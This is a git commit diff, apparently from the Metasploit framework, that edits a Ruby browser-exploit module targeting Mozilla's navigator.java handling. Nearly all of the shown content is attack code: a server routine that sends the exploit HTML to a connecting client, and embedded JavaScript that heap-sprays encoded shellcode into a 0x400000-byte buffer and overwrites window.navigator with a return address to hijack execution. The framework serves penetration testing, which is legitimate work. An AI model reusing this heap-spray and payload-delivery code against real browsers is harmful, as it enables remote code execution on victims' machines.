don't hang the browser building the exploit buffer if we can't exploit it
git-svn-id: file:///home/svn/framework3/trunk@5558 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
9b3c8e2d72
commit
a0a203fba7
|
@ -90,7 +90,7 @@ class Exploits::Multi::Browser::Mozilla_NavigatorJava < Msf::Exploit::Remote
|
|||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
|
||||
|
||||
# Handle the payload
|
||||
|
@ -105,7 +105,7 @@ class Exploits::Multi::Browser::Mozilla_NavigatorJava < Msf::Exploit::Remote
|
|||
<html><head>
|
||||
<script>
|
||||
function Exploit() {
|
||||
|
||||
if (window.navigator.javaEnabled) {
|
||||
var shellcode = unescape("#{enc_code}");
|
||||
var b = unescape("#{target['Fill']}");
|
||||
while (b.length <= 0x400000) b+=b;
|
||||
|
@ -119,8 +119,6 @@ class Exploits::Multi::Browser::Mozilla_NavigatorJava < Msf::Exploit::Remote
|
|||
b.substring(0, 0x100000 - shellcode.length) + shellcode;
|
||||
}
|
||||
|
||||
|
||||
if (window.navigator.javaEnabled) {
|
||||
window.navigator = (#{target['Ret']} / 2);
|
||||
try {
|
||||
java.lang.reflect.Runtime.newInstance(
|
||||
|
|
Loading…
Reference in New Issue